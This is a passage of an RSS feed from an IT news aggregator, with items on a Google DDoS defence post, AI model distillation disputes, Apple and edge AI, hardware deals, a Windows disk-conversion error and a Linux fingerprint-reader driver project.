<link>https://tsecurity.de/de/3663811/it-nachrichten/the-end-of-an-era-china-enforces-mandatory-rule-to-cull-inefficient-solar-panels-signals-end-of-ultra-cheap-pv-price-wars/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663811/it-nachrichten/the-end-of-an-era-china-enforces-mandatory-rule-to-cull-inefficient-solar-panels-signals-end-of-ultra-cheap-pv-price-wars/</guid>
<pubDate>Sun, 12 Jul 2026 22:16:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[China introduces mandatory solar efficiency standards that could remove outdated factories, reduce oversupply, and reshape competition across the photovoltaic industry.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Right Way to Get Rid of Old Laptops, PCs and Printers (and It's Free)]]></title>
<description><![CDATA[Getting rid of old computers and printers responsibly is free, accessible and considerably simpler than most people assume.]]></description>
<link>https://tsecurity.de/de/3663433/it-nachrichten/the-right-way-to-get-rid-of-old-laptops-pcs-and-printers-and-its-free/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663433/it-nachrichten/the-right-way-to-get-rid-of-old-laptops-pcs-and-printers-and-its-free/</guid>
<pubDate>Sun, 12 Jul 2026 16:46:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Getting rid of old computers and printers responsibly is free, accessible and considerably simpler than most people assume.]]></content:encoded>
</item>
<item>
<title><![CDATA[8 Linux Handheld Computers You Can Splurge On]]></title>
<description><![CDATA[The rest are ready to use out of the box without requiring a spare Raspberry Pi or tinkering.]]></description>
<link>https://tsecurity.de/de/3662863/unix-server/8-linux-handheld-computers-you-can-splurge-on/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662863/unix-server/8-linux-handheld-computers-you-can-splurge-on/</guid>
<pubDate>Sun, 12 Jul 2026 08:15:51 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The rest are ready to use out of the box without requiring a spare Raspberry Pi or tinkering.]]></content:encoded>
</item>
<item>
<title><![CDATA[Exponential growth in DDoS attack volumes]]></title>
<description><![CDATA[Security threats such as distributed denial-of-service (DDoS) attacks disrupt businesses of all sizes, leading to outages, and worse, loss of user trust. These threats are a big reason why at Google we put a premium on service reliability that’s built on the foundation of a rugged network. To hel...]]></description>
<link>https://tsecurity.de/de/3662839/it-security-nachrichten/exponential-growth-in-ddos-attack-volumes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662839/it-security-nachrichten/exponential-growth-in-ddos-attack-volumes/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Security threats such as distributed denial-of-service (DDoS) attacks disrupt businesses of all sizes, leading to outages, and worse, loss of user trust. These threats are a big reason why at Google we put a premium on service reliability that’s built on the foundation of a rugged network. </p><p>To help ensure reliability, we’ve devised some innovative ways to defend against advanced attacks. In this post, we’ll take a deep dive into DDoS threats, showing the trends we’re seeing and describing how we prepare for multi-terabit attacks, so your sites stay up and running.</p><h3>Taxonomy of attacker capabilities</h3><p>With a DDoS attack, an adversary hopes to disrupt their victim's service with a flood of useless traffic. While this attack doesn't expose user data and doesn't lead to a compromise, it can result in an outage and loss of user trust if not quickly mitigated.</p><p>Attackers are constantly developing new techniques to disrupt systems. They give their attacks fanciful names, like Smurf, Tsunami, XMAS tree, HULK, Slowloris, cache bust, TCP amplification, javascript injection, and a dozen variants of reflected attacks. Meanwhile, the defender must consider every possible target of a DDoS attack, from the network layer (routers/switches and link capacity) to the application layer (web, DNS, and mail servers). Some attacks may not even focus on a specific target, but instead attack every IP in a network. Multiplying the dozens of attack types by the diversity of infrastructure that must be defended leads to endless possibilities.</p><p>So, how can we simplify the problem to make it manageable? Rather than focus on attack methods, Google groups volumetric attacks into a handful of key metrics:</p><p></p><ul><li><b>bps</b>	network bits per second → attacks targeting network links</li><li><b>pps</b>	network packets per second → attacks targeting network equipment or DNS servers</li><li><b>rps</b>	HTTP(S) requests per second → attacks targeting application servers</li></ul><p></p><p>This way, we can focus our efforts on ensuring each system has sufficient capacity to withstand attacks, as measured by the relevant metrics.</p><h3>Trends in DDoS attack volumes</h3><p>Our next task is to determine the capacity needed to withstand the largest DDoS attacks for each key metric. Getting this right is a necessary step for efficiently operating a reliable network—overprovisioning wastes costly resources, while underprovisioning can result in an outage.</p><p>To do this, we analyzed hundreds of significant attacks we received across the listed metrics, and included credible reports shared by others. We then plot the largest attacks seen over the past decade to identify trends. (Several years of data prior to this period informed our decision of what to use for the first data point of each metric.)</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/DDoS_attacks.max-1000x1000.jpg" alt="DDoS attacks.jpg">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>The exponential growth across all metrics is apparent, often generating alarmist headlines as attack volumes grow. But we need to factor in the exponential growth of the internet itself, which provides bandwidth and compute to defenders as well. After accounting for the expected growth, the results are less concerning, though still problematic.</p><h3>Architecting defendable infrastructure</h3><p>Given the data and observed trends, we can now extrapolate to determine the spare capacity needed to absorb the largest attacks likely to occur.</p><p><b>bps</b> (network bits per second)<br>Our infrastructure absorbed a 2.5 Tbps DDoS in September 2017, the culmination of a six-month campaign that utilized multiple methods of attack. Despite simultaneously targeting thousands of our IPs, presumably in hopes of slipping past automated defenses, the attack had no impact. The attacker used <a href="https://blog.google/threat-analysis-group/how-were-tackling-evolving-online-threats" target="_blank">several networks</a> to spoof 167 Mpps (millions of packets per second) to 180,000 exposed CLDAP, DNS, and SNMP servers, which would then send large responses to us. This demonstrates the volumes a well-resourced attacker can achieve: This was four times larger than the record-breaking 623 Gbps attack from the Mirai botnet a year earlier. It remains the highest-bandwidth attack reported to date, leading to reduced confidence in the extrapolation.<br></p><p><b>pps</b> (network packets per second) <br>We’ve observed a consistent growth trend, with a 690 Mpps attack generated by an IoT botnet this year. A notable outlier was a 2015 attack on a customer VM, in which an IoT botnet ramped up to 445 Mpps in 40 seconds—a volume so large we initially thought it was a monitoring glitch!</p><p><b>rps</b> (HTTP(S) requests per second)<br>In March 2014, malicious javascript injected into thousands of websites via a network man-in-the-middle attack caused hundreds of thousands of browsers to flood YouTube with requests, peaking at 2.7 Mrps (millions of requests per second). That was the largest attack known to us until recently, when a Google Cloud customer was attacked with 6 Mrps. The slow growth is unlike the other metrics, suggesting we may be under-estimating the volume of future attacks.</p><p>While we can estimate the expected size of future attacks, we need to be prepared for the <i>unexpected</i>, and thus we over-provision our defenses accordingly. Additionally, we design our systems to degrade gracefully in the event of overload, and write playbooks to guide a manual response if needed. For example, our layered defense strategy allows us to block high-rps and high-pps attacks in the network layer before they reach the application servers. Graceful degradation applies at the network layer, too: Extensive peering and network ACLs designed to throttle attack traffic will mitigate potential collateral damage in the unlikely event links become saturated.</p><p>For more detail on the layered approach we use to mitigate record-breaking DDoS attacks targeting our services, infrastructure, or customers, see Chapter 10 of our book, <a href="https://landing.google.com/sre/resources/foundationsandprinciples/srs-book/" target="_blank">Building Secure and Reliable Systems</a>.</p><h3>Cloud-based defenses</h3><p>We recognize the scale of potential DDoS attacks can be daunting. Fortunately, by deploying <a href="https://cloud.google.com/armor">Google Cloud Armor</a> integrated into our <a href="https://cloud.google.com/load-balancing">Cloud Load Balancing </a>service—which can scale to absorb massive DDoS attacks—you can protect services deployed in Google Cloud, other clouds, or on-premise from attacks. We recently announced <a href="https://cloud.google.com/blog/products/identity-security/google-cloud-armor-features-to-protect-your-websites-and-applications">Cloud Armor Managed Protection</a>, which enables users to further simplify their deployments, manage costs, and reduce overall DDoS and application security risk.</p><p>Having sufficient capacity to absorb the largest attacks is just one part of a comprehensive DDoS mitigation strategy. In addition to providing scalability, our load balancer terminates network connections on our global edge, only sending well-formed requests on to backend infrastructure. As a result it can automatically filter many types of volumetric attacks. For example, UDP amplification attacks, synfloods, and some application-layer attacks will be silently dropped. The next line of defense is the Cloud Armor WAF, which provides built-in rules for common attacks, plus the ability to deploy custom rules to drop abusive application layer requests using a broad set of HTTP semantics.</p><h3>Working together for collective security</h3><p>Google works with others in the internet community to identify and dismantle infrastructure used to conduct attacks. As a specific example, even though the 2.5 Tbps attack in 2017 didn't cause any impact, we reported thousands of vulnerable servers to their network providers, and also worked with network providers to trace the source of the spoofed packets so they could be filtered.</p><p>We encourage everyone to join us in this effort. Individual users should ensure their computers and IoT devices are patched and secured. Businesses should report criminal activity, ask their network providers to trace the sources of spoofed attack traffic, and share information on attacks with the internet community in a way that doesn't provide timely feedback to the adversary. By working together, we can reduce the impact of DDoS attacks.</p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security cameras are going cheap for Prime Day in Australia — here are 5 subscription-free options for a safer home]]></title>
<description><![CDATA[Amazon Prime Day has discounted a wide range of security cameras, but while the ultra-cheap Ring and Blink are tempting, there are great deals for subscription-free options, too.]]></description>
<link>https://tsecurity.de/de/3662555/it-nachrichten/security-cameras-are-going-cheap-for-prime-day-in-australia-here-are-5-subscription-free-options-for-a-safer-home/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662555/it-nachrichten/security-cameras-are-going-cheap-for-prime-day-in-australia-here-are-5-subscription-free-options-for-a-safer-home/</guid>
<pubDate>Sun, 12 Jul 2026 02:17:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon Prime Day has discounted a wide range of security cameras, but while the ultra-cheap Ring and Blink are tempting, there are great deals for subscription-free options, too.]]></content:encoded>
</item>
<item>
<title><![CDATA[China's AI Companies May Be 'Distilling' America's AI Models]]></title>
<description><![CDATA[In March, Anthropic's Claude "quietly deployed software to spy on China-based customers," reports the Washington Post — apparently to unmask Chinese rivals "suspected of hijacking its technology to make their own AI tools smarter."

Last week Anthropic removed the spyware "after a software develo...]]></description>
<link>https://tsecurity.de/de/3662248/it-security-nachrichten/chinas-ai-companies-may-be-distilling-americas-ai-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662248/it-security-nachrichten/chinas-ai-companies-may-be-distilling-americas-ai-models/</guid>
<pubDate>Sat, 11 Jul 2026 19:52:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In March, Anthropic's Claude "quietly deployed software to spy on China-based customers," reports the Washington Post — apparently to unmask Chinese rivals "suspected of hijacking its technology to make their own AI tools smarter."

Last week Anthropic removed the spyware "after a software developer revealed its existence and privacy advocates criticized Anthropic, saying it had surveilled its own users."

 Anthropic's tracking code was designed in part to catch Chinese firms "distilling" its AI models, a technique that involves pressing a large, expensive AI system to serve as a tutor to a smaller, cheaper one. Asking the larger system huge numbers of questions — hundreds of thousands or more — generates responses that can be used to upgrade the power of the smaller one on the cheap. Distillation isn't illegal, and it has been used for years in the AI industry. But distillation without permission is against AI companies' rules, and, used effectively, is giving Chinese AI companies a major leg up, American AI companies say... Anthropic and ChatGPT-maker OpenAI have both accused Chinese AI companies of using this technique to build copycat AI models of their own.

 In a May blog post, Anthropic said that Chinese companies' use of distillation, along with evading U.S. export controls on high-end computer chips, has allowed them to "trail closely" behind U.S. models. But if these techniques can be blocked, it might be possible for the United States to "lock in a 12-24 month lead" on Chinese capabilities, the company said... This month, Anthropic said in a letter to U.S. senators that was obtained by The Post that it uncovered a campaign in which Chinese tech giant Alibaba's Qwen AI team used roughly 25,000 fraudulent accounts to generate more than 28.8 million exchanges with Claude to improve its own technology. In February, Anthropic made similar accusations against the Chinese firms Deepseek, Moonshot and MiniMax and said the campaigns were "growing in intensity and sophistication...." Anthropic and OpenAI have appealed to the U.S. government, arguing that distillation amounts to intellectual property theft that harms the U.S. in the geopolitical AI contest.... 

That Chinese AI labs are using U.S. models to improve their own technology appears beyond dispute. In a February 2025 study, researchers from China's Peking University and the state-funded Chinese Academy of Sciences developed methods to detect signs of distillation in leading large language models. They concluded that, with the exception of ByteDance's Doubao, most domestic models they tested showed substantial evidence of distillation, mostly drawing from U.S. models... In one set of intensive tests, a Qwen model misidentified itself as Claude nearly a third of the time, the Chinese researchers found. 

U.S. firms have also used distillation to piggyback on AI systems made by others. In 2024, OpenAI released a tool to make it easier for customers to distill its own models and produce data sets for AI training. SpaceX founder Elon Musk said in court testimony in May that his AI company xAI used distillation to train its models and that the technique is common throughout the industry. 

The article also notes that Anthropic "said it has banned nearly 700,000 accounts that were using Claude in China." But the article includes this quote from Kyle Chan, a fellow at the Washington-based Brookings Institution's China Center. "Anthropic's framing is that this is a geopolitical contest for basically the future of the world and freedom and democracy. It's that this is not just undercutting the U.S. commercially, but undercutting American strategic advantage in the most powerful technology we know today."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=China's+AI+Companies+May+Be+'Distilling'+America's+AI+Models%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F11%2F040239%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F11%2F040239%2Fchinas-ai-companies-may-be-distilling-americas-ai-models%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/07/11/040239/chinas-ai-companies-may-be-distilling-americas-ai-models?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung set to launch cheap PCIe 4.0 990 SSD as “RAMpocalypse” pushes even the world's largest SSD vendor to remove DRAM from product]]></title>
<description><![CDATA[Samsung briefly listed a DRAM-free 1TB PCIe 4.0 SSD featuring Host Memory Buffer before quietly removing the product page completely.]]></description>
<link>https://tsecurity.de/de/3662224/it-nachrichten/samsung-set-to-launch-cheap-pcie-40-990-ssd-as-rampocalypse-pushes-even-the-worlds-largest-ssd-vendor-to-remove-dram-from-product/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662224/it-nachrichten/samsung-set-to-launch-cheap-pcie-40-990-ssd-as-rampocalypse-pushes-even-the-worlds-largest-ssd-vendor-to-remove-dram-from-product/</guid>
<pubDate>Sat, 11 Jul 2026 19:31:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Samsung briefly listed a DRAM-free 1TB PCIe 4.0 SSD featuring Host Memory Buffer before quietly removing the product page completely.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Avoided Semiconductor Tariffs Last Year Thanks To Intel Chip Deal]]></title>
<description><![CDATA[A recent report explains how Apple avoided semiconductor tariffs last year thanks to an Intel chip deal. Tim Cook traveled to Washington last summer to stop a 100 percent tax on imported computer parts. A tax like that would make every device much more expensive to build.



The company secured a...]]></description>
<link>https://tsecurity.de/de/3661882/ios-mac-os/apple-avoided-semiconductor-tariffs-last-year-thanks-to-intel-chip-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661882/ios-mac-os/apple-avoided-semiconductor-tariffs-last-year-thanks-to-intel-chip-deal/</guid>
<pubDate>Sat, 11 Jul 2026 15:08:56 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A recent report explains how Apple avoided semiconductor tariffs last year thanks to an Intel chip deal. Tim Cook traveled to Washington last summer to stop a 100 percent tax on imported computer parts. A tax like that would make every device much more expensive to build.



The company secured a pass on these fees by agreeing to spend money inside the country. That big agreement heavily involved another major name in technology.



The government pushed the tech giant to support local manufacturing



During the talks, government officials brought up Intel. The administration made it clear that helping this American brand was the main way to secure the tax break. Because of this push, we now know that Apple avoided semiconductor tariffs last year thanks to the Intel chip deal.



The plan worked for both sides. The government recently shared on social media that Apple will start using parts made by Intel inside its popular devices. This public news sent the stock price for the chip builder to a record high.



The brand plans to use these local parts inside upcoming Mac computers and future iPhone models. Before this report came out, nobody knew that the talks about taxes were connected to this manufacturing partnership.



Building parts locally keeps the final price lower for buyers



The main goal of the tax rule was to make large businesses build things in America. By choosing to work with a local partner, the company did not have to pay extra import fees on its part. This meant it could keep the final prices normal for people buying a new phone or laptop.



Even with this good news, the company still faced some financial problems later because of a worldwide shortage of memory parts. However, solving the tax issue was a big win.



It shows how much power the government has over where technology brands choose to build things. By working together, the brand protected its profit while giving a boost to a local factory.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple is prepping for life after the AI gold rush]]></title>
<description><![CDATA[Consumer electronics prices are shooting up. Energy prices are increasing fast. Even water bills are climbing. For a technology that promises “efficiency,” the ongoing AI gold rush seems to be taking things away, much like the proverbial gift that keeps on grabbing.



With hundreds of billions i...]]></description>
<link>https://tsecurity.de/de/3661667/it-nachrichten/apple-is-prepping-for-life-after-the-ai-gold-rush/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661667/it-nachrichten/apple-is-prepping-for-life-after-the-ai-gold-rush/</guid>
<pubDate>Sat, 11 Jul 2026 12:18:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a>Consumer electronics prices </a><a href="https://counterpointresearch.com/en/insights/infographic-iphone-17promax-and-iphone-18promax-e-bom-cost-comparison">are </a><a href="https://counterpointresearch.com/en/insights/infographic-iphone-17promax-and-iphone-18promax-e-bom-cost-comparison" target="_blank" rel="noreferrer noopener">shooting up</a>. Energy prices are <a href="https://news.sky.com/story/energy-costs-rise-and-stocks-fall-sharply-as-us-iran-peace-is-shattered-13561710" target="_blank" rel="noreferrer noopener">increasing fast</a>. Even <a href="https://www.theguardian.com/us-news/2020/jun/23/millions-of-americans-cant-afford-water-bills-rise" target="_blank" rel="noreferrer noopener">water bills are climbing</a>. For a technology that promises “efficiency,” the ongoing AI gold rush seems to be <a href="https://www.applemust.com/omdia-says-the-hammer-has-fallen-on-low-cost-smartphones/">taking thing</a><a href="https://www.applemust.com/omdia-says-the-hammer-has-fallen-on-low-cost-smartphones/" target="_blank" rel="noreferrer noopener">s</a><a href="https://www.applemust.com/omdia-says-the-hammer-has-fallen-on-low-cost-smartphones/"> away</a>, much like the proverbial gift that keeps on grabbing.</p>



<p>With hundreds of billions in AI investment already racked up for 2026, it’s important to remember the entire industry is currently built on a mountain of debt — and much of this borrowed money is being spent on data center capacity. That’s true, even though consumers would probably rather have a cheap Mac than spend money on an AI subscription service. </p>



<p>All this debt is being amassed because a small number of people at a very small number of firms have decided to make huge investments in the tech, which at present requires huge quantities of energy, memory and data center capacity to run. </p>



<p>But it won’t always be this way.</p>



<h2 class="wp-block-heading"><strong>A mountain of debt, but we’re short of memory</strong></h2>



<p>Look, the industry as it is now just doesn’t seem sustainable. Trillions are being spent and memory vendors are shifting capacity to make the high-value, high-bandwidth memory these server farms require — at the expense of traditional consumer electronic suppliers. </p>



<p>The rapid rollout just creates AI tech will need to be replaced, likely at greater cost, in a few years’ time. In a nutshell, the industry is spending trillions to make billions; Sequoia’s David Cahn estimates the AI revenue gap between infrastructure expenditure and the revenue to justify it has <a href="https://shattered.io/ram-prices-ai-memory-shortage-2026/" data-type="link" data-id="https://shattered.io/ram-prices-ai-memory-shortage-2026/" target="_blank" rel="noreferrer noopener">already fallen $600 billion a year short</a>. </p>



<p>At some point, the VC money will run dry, after which it is inevitable deployment will slow and demand for all the components — including memory used in these large language model (LLM) data centers will fall. Some analysts think <a href="https://seekingalpha.com/article/4920983-drams-meltdown-and-cyclical-memoryoversupply-risks-discussed-initiate-hold" data-type="link" data-id="https://seekingalpha.com/article/4920983-drams-meltdown-and-cyclical-memoryoversupply-risks-discussed-initiate-hold" target="_blank" rel="noreferrer noopener">capex growth in the sector could halt by mid-2027</a>.</p>



<p>At that point, memory vendors will have expensive production facilities and extensive defaults on their order books. If the 2027 prediction is true, those vendors will feel this impact in the form of reduced forward orders by the end of 2026.</p>



<p>The problem is that the investments have become so vast that any slowdown will have consequential effects across all sections of the economy. </p>



<h2 class="wp-block-heading"><strong>After the gold rush</strong></h2>



<p>Almost certainly, the technology will continue to improve, and the problems we’re looking to solve today might no longer be challenges once fresh innovation strikes. So, what happens next? </p>



<p>Let’s think about memory, the biggest pain point at the moment and where we will (hopefully) find future innovation. At present, some of the largest LLMs sit inside data centers supported by vast quantities of memory. These machines are built to handle really complex tasks, but <a href="https://rethinkpriorities.org/research-area/estimating-the-usage-and-utility-of-llms-in-the-us-general-public/" target="_blank" rel="noreferrer noopener">most of the time</a> are used to search the web, deliver writing assistance and summarize documents. Those frequently-transacted tasks barely stretch the capabilities of these services and Apple, and others have already figured out how to run such tasks on device.</p>



<p>That’s the first obvious space in which to innovate – to invest in 1-bit data LLM systems to miniaturize and distill models so they actually run on the device you’re using, rather than relying on all those remote servers. </p>



<h2 class="wp-block-heading"><strong>The Apple shopping list</strong></h2>



<p>Apple’s <a href="https://www.theinformation.com/articles/khosla-backed-startup-claims-breakthrough-largest-ever-ai-model-iphone" target="_blank" rel="noreferrer noopener">interest in 1-bit data LLM pioneer PrismML</a> speaks volumes about where the iPhone maker sees LLM development going, as did its acquisitions of Kuzu Inc., WhyLabs Inc, Pointable Inc., and Datakalab Inc. in recent years. </p>



<p>The beauty of PrismML’s tech is what it can do. It was recently used to compress Alibaba’s huge 27-billion-parameter Qwen 3.6 model from 54GB down to under 4GB, running with all 27 billion parameters active simultaneously — all without sacrificing benchmark performance. </p>



<p>The kicker? It managed to run that advanced, sophisticated AI model on <a href="https://thecorenews.substack.com/p/the-core-appletldr-july-9?r=5l3lg&amp;utm_campaign=post-expanded-share&amp;utm_medium=web&amp;triedRedirect=true">an iPhone 17 Pro</a>. My take? Just as music used to be captured on reel-to-reel tape and is now digitized and in the air, AI will move from the data center to the device, possibly faster than people expect. </p>



<p>Apple has three pillars for AI: On-device for most of what you need, on Private Cloud Compute servers for most of the rest, or via third-party server-based systems for the most demanding tasks. That’s a blueprint for how the industry will evolve as technologies represented by PrismML tend toward bringing more of that intelligence to the device. Over time, those local tasks will become more sophisticated, eroding the available market for today’s heavily-indebted AI incumbents. </p>



<p>Emerging priorities such as the need for privacy, data sovereignty, and trusted cloud will also spur the emergence of a multipolar AI future in which no one vendor dominates, further complicating their journey to profitability. It’s a model that favors the kind of service-agnostic, edgeAI approach Apple has taken.</p>



<h2 class="wp-block-heading"><strong>EdgeAI for the rest of us</strong></h2>



<p>In the end, I don’t think there will be a need for much of the AI data center capacity now being built, because Apple and others will figure out how to use data minimization to transact sophisticated AI tasks on the device. For the most part, EdgeAI will deliver the consumer AI experience, while data centers cater to more sophisticated use. One day, after this gold rush has run its course, we’ll peer outside of our basements to see which of today’s AI firms actually are the chosen ones.</p>



<p>They may not be the ones you expect.</p>



<p><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social">BlueSky</a>, <a href="http://www.linkedin.com/in/jonnyevans">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans">Mastodon</a>, and subscribe to the human-curated daily Apple news briefing at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix reportedly among parties in talks to buy Letterboxd]]></title>
<description><![CDATA[Sony Pictures and Paramount are said to also be among potential buyers for the film-focused social platformLetterboxd is reportedly in talks with potential buyers.The owners of the popular social platform for movies are discussing a sale with companies including Netflix, Sony Pictures and Paramou...]]></description>
<link>https://tsecurity.de/de/3661527/it-nachrichten/netflix-reportedly-among-parties-in-talks-to-buy-letterboxd/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661527/it-nachrichten/netflix-reportedly-among-parties-in-talks-to-buy-letterboxd/</guid>
<pubDate>Sat, 11 Jul 2026 10:32:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Sony Pictures and Paramount are said to also be among potential buyers for the film-focused social platform</p><p>Letterboxd is reportedly in talks with potential buyers.</p><p>The owners of the popular social platform for movies are discussing a sale with companies including <a href="https://www.theguardian.com/media/netflix">Netflix</a>, <a href="https://www.theguardian.com/film/sony-pictures">Sony Pictures</a> and <a href="https://www.theguardian.com/film/paramount-pictures">Paramount</a>, according to the industry newsletter <a href="https://puck.news/ted-sarandos-youtube-panic-inside-netflixs-cheap-content-pivot/">Puck</a>.</p> <a href="https://www.theguardian.com/film/2026/jul/10/letterboxd-netflix-sales-talks">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[MBR2GPT Failed to update reagent.xml on Windows computer]]></title>
<description><![CDATA[MBR2GPT is a command-line utility in Windows computers used to convert an MBR disk into a GPT. The best part of this utility is that it converts an MBR disk into a GPT disk without erasing the data. Some users are getting the error “MBR2GPT Failed to update reagent.xml” while using this tool. Thi...]]></description>
<link>https://tsecurity.de/de/3661111/windows-tipps/mbr2gpt-failed-to-update-reagentxml-on-windows-computer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661111/windows-tipps/mbr2gpt-failed-to-update-reagentxml-on-windows-computer/</guid>
<pubDate>Sat, 11 Jul 2026 04:11:22 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="700" height="400" src="https://www.thewindowsclub.com/wp-content/uploads/2026/06/MBR2GPT-Failed-to-update-reagent.png" class="attachment-full size-full wp-post-image" alt="MBR2GPT Failed to update reagent" decoding="async" fetchpriority="high" srcset="https://www.thewindowsclub.com/wp-content/uploads/2026/06/MBR2GPT-Failed-to-update-reagent.png 700w, https://www.thewindowsclub.com/wp-content/uploads/2026/06/MBR2GPT-Failed-to-update-reagent-500x286.png 500w, https://www.thewindowsclub.com/wp-content/uploads/2026/06/MBR2GPT-Failed-to-update-reagent-300x171.png 300w" sizes="(max-width: 700px) 100vw, 700px">MBR2GPT is a command-line utility in Windows computers used to convert an MBR disk into a GPT. The best part of this utility is that it converts an MBR disk into a GPT disk without erasing the data. Some users are getting the error “MBR2GPT Failed to update reagent.xml” while using this tool. This error […]</p>
<p>This article <a href="https://www.thewindowsclub.com/mbr2gpt-failed-to-update-reagent-xml-on-windows-computer">MBR2GPT Failed to update reagent.xml on Windows computer</a> first appeared on <a href="https://www.thewindowsclub.com/">TheWindowsClub.com</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Got a "Windows Hello only" USB fingerprint reader working on Linux by running the vendor's Windows matcher natively]]></title>
<description><![CDATA[Bought a cheap standalone USB fingerprint dongle (Focal-systems FT9201, 2808:93a9) that's marketed as Windows Hello only. libfprint's built-in matcher does a poor job on the tiny 96×96 sensor, and the device is "match-on-host" - the actual matching lives in a vendor Windows DLL, not on the chip. ...]]></description>
<link>https://tsecurity.de/de/3661110/linux-tipps/got-a-windows-hello-only-usb-fingerprint-reader-working-on-linux-by-running-the-vendors-windows-matcher-natively/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661110/linux-tipps/got-a-windows-hello-only-usb-fingerprint-reader-working-on-linux-by-running-the-vendors-windows-matcher-natively/</guid>
<pubDate>Sat, 11 Jul 2026 04:09:44 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Bought a cheap standalone <a href="https://www.amazon.com/dp/B0DK7LQZGH">USB fingerprint dongle (Focal-systems FT9201, 2808:93a9)</a> that's marketed as Windows Hello only. libfprint's built-in matcher does a poor job on the tiny 96×96 sensor, and the device is "match-on-host" - the actual matching lives in a vendor Windows DLL, not on the chip.</p> <p>So instead of reimplementing the matcher, the driver loads the vendor's Windows matching engine (ftWbioEngineAdapter.dll) in-process on Linux and calls its WinBio interface for enroll/verify. It's a small PE loader with ~90 kernel32 shims and a fake TEB. Getting there also meant reverse-engineering the sensor's firmware-boot sequence (the MCU wouldn't run its firmware without a specific register-config dance).</p> <p>The loader maps code read-execute and data read-write from an in-memory file, so no page is ever writable+executable - meaning it runs under fprintd's default MemoryDenyWriteExecute hardening without disabling anything. It enrolls and verifies through fprintd / KDE now.</p> <p>Packaged as an out-of-tree libfprint driver - no proprietary binaries committed (the DLL and firmware are fetched/extracted from public sources at build time).</p> <p>I also wrote up the method, since it should generalize to other match-on-host "Windows Hello only" readers.</p> <p>*Edit: This project would not have been possible without the help of agentic coding. I'm personally responsible for research, testing, ideation and pushing this goal forward. Claude Code and my development stack handled the majority of code, testing and writing tasks. I am not looking for kudos on being an amazing developer or am looking for clout. I just wanted to share a method of actualizing something into existence that I know will help solve for an underserved gap in Linux hardware parity. </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/OMGrant"> /u/OMGrant </a> <br> <span><a href="https://github.com/OMGrant/ft9201-libfprint">[link]</a></span>   <span><a 